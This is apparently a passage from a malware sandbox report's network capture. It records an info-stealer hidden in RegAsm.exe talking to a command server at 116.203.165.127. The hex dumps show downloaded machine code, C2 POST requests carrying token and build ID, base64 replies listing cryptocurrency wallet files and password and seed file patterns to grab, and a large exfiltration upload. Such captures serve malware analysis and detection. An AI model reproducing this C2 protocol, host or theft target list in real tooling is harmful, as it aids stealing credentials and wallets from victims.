1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 Data Ascii: 8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 Data Ascii: `P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:52 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:52 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------GDBKKFHIEGDHJKECAAKKCont
2024-09-20 09:07:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:53 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 44 47 43 46 48 49 45 48 4a 4a 4a 4a 45 43 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------AAFIDGCFHIEHJJJJECAKContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------AAFIDGCFHIEHJJJJECAKCont
2024-09-20 09:07:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:54 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:54 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------GDAEBKJDHDAFIECBAKKJCont
2024-09-20 09:07:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:55 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:56 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:56 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------CFBFHIEBKJKFHIEBFBAECont
2024-09-20 09:07:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49760	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:58 UTC	283	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 130469 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------JDGCGHCGHCBFHJJKKJEHCont
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 50 64 33 57 76 33 2f 6f 65 71 2f 77 44 43 78 76 43 66 2f 51 56 2f 38 6c 35 66 2f 69 61 32 39 4a 31 6e 54 39 63 73 7a 64 36 62 63 43 65 45 4f 55 4c 42 53 75 47 47 44 6a 42 41 50 63 56 34 62 34 69 38 50 32 58 68 37 53 64 4f 6a 6d 6c 6e 62 57 72 68 50 4f 6e 69 33 44 5a 43 68 7a 67 59 78 6e 64 2b 50 59 2b 31 64 74 38 4e 72 6d 39 74 66 42 64 77 39 68 70 2f 32 32 55 36 69 77 4d 66 6e 4c 48 68 66 4c 54 6e 4a 2f 44 6a 33 72 78 46 4a 33 73 7a 36 43 6a 69 36 6a 71 63 6c 52 4c 62 70 63 36 69 57 30 61 58 54 72 6e 54 62 7a 52 37 71 35 69 65 65 61 51 50 47 38 57 4d 4e 49 7a 4b 52 75 63 45 45 42 68 32 72 7a 44 56 39 4b 75 4e 49 76 7a 62 58 45 62 78 37 68 76 6a 33 6c 64 78 51 6b 67 45 37 53 51 44 77 65 39 65 73 66 32 6a 72 58 6c 52 4e 2f 59 48 7a 73 70 4c 70 39 73 54 35 Data Ascii: Pd3Wv3/oeq/wDCxvCf/QV/8l5f/ia29J1nT9cszd6bcCeEOULBSuGGDjBAPcV4b4i8P2Xh7SdOjmlnbWrhPOni3DZChzgYxnd+PY+1dt8Nrm9tfBdw9hp/22U6iwMfnLHhfLTnJ/Dj3rxFJ3sz6Cji6jqclRLbpc6iW0aXTrnTbzR7q5ieeaQPG8WMNIzKRucEEBh2rzDV9KuNIvzbXEbx7hvj3ldxQkgE7SQDwe9esf2jrXlRN/YHzspLp9sT5
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 77 70 44 53 39 61 43 4f 39 46 67 47 6b 63 6d 6b 36 30 34 69 6b 4e 42 51 67 2f 57 67 30 76 54 46 4a 6e 2b 64 41 43 55 68 70 78 50 31 70 4d 65 6c 41 43 55 48 6d 6a 72 53 6e 33 6f 47 4a 2b 6c 42 34 6f 36 47 69 67 41 77 4f 74 4a 78 78 52 30 6f 50 31 7a 53 48 6f 42 70 4d 59 36 30 76 66 69 6b 6f 47 49 66 62 72 51 61 58 50 4a 39 71 51 2f 6c 37 30 41 49 4f 74 48 36 55 76 66 33 4e 49 4f 50 72 51 41 48 30 6f 49 6f 6f 4e 46 68 6e 65 31 30 76 67 51 34 38 53 4c 2f 77 42 63 58 2f 6c 58 4e 56 63 30 33 55 72 6a 53 62 76 37 56 61 6c 52 4b 46 4b 67 73 75 63 5a 72 6a 78 56 4f 56 57 6a 4b 45 64 32 65 42 67 61 30 61 4f 49 68 55 6e 73 6d 53 36 50 59 61 6c 34 6b 38 54 72 34 69 74 72 47 4f 47 30 6a 31 43 4a 6e 56 66 6c 36 4f 70 4f 42 33 49 48 4a 50 76 57 66 34 76 75 6e 68 38 58 Data Ascii: wpDS9aCO9FgGkcmk604ikNBQg/Wg0vTFJn+dACUhpxP1pMelACUHmjrSn3oGJ+lB4o6GigAwOtJxxR0oP1zSHoBpMY60vfikoGIfbrQaXPJ9qQ/l70AIOtH6Uvf3NIOPrQAH0oIooNFhne10vgQ48SL/wBcX/lXNVc03UrjSbv7ValRKFKgsucZrjxVOVWjKEd2eBga0aOIhUnsmS6PYal4k8Tr4itrGOG0j1CJnVfl6OpOB3IHJPvWf4vunh8X
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 6a 46 46 78 69 55 55 74 4a 52 63 42 4b 4b 57 6b 70 67 46 47 4b 4b 4b 42 69 55 55 74 4a 54 41 4b 53 6c 6f 6f 47 4a 52 52 52 51 41 6c 42 6f 70 54 54 41 53 69 67 30 43 67 59 55 68 70 61 4b 41 45 6f 6f 6f 35 70 6a 43 69 69 69 6d 41 6e 61 69 6c 70 4b 41 45 6f 7a 52 52 51 4d 58 4f 61 4b 53 69 67 41 70 61 53 6c 70 67 46 42 6f 70 4b 41 43 69 69 69 6d 4d 4d 30 74 4a 52 51 49 57 69 6a 4e 46 41 42 30 6f 6f 6f 7a 54 47 42 6f 6f 70 44 51 41 74 46 4a 53 30 41 46 46 46 47 61 41 46 48 4e 46 49 4b 58 4e 41 42 51 61 4b 4b 51 42 52 53 55 74 41 68 61 54 46 48 30 70 54 53 41 54 42 70 63 63 55 55 55 77 41 44 32 6f 78 52 52 53 41 54 47 61 4e 75 4b 64 53 30 58 59 44 63 55 68 48 53 6e 59 34 6f 41 7a 78 53 75 46 78 6d 50 51 30 68 54 49 36 66 6a 56 68 4c 65 5a 2f 75 77 79 48 36 4b Data Ascii: jFFxiUUtJRcBKKWkpgFGKKKBiUUtJTAKSlooGJRRRQAlBopTTASig0CgYUhpaKAEooo5pjCiiimAnailpKAEozRRQMXOaKSigApaSlpgFBopKACiiimMM0tJRQIWijNFAB0ooozTGBoopDQAtFJS0AFFFGaAFHNFIKXNABQaKKQBRSUtAhaTFH0pTSATBpccUUUwAD2oxRRSATGaNuKdS0XYDcUhHSnY4oAzxSuFxmPQ0hTI6fjVhLeZ/uwyH6K
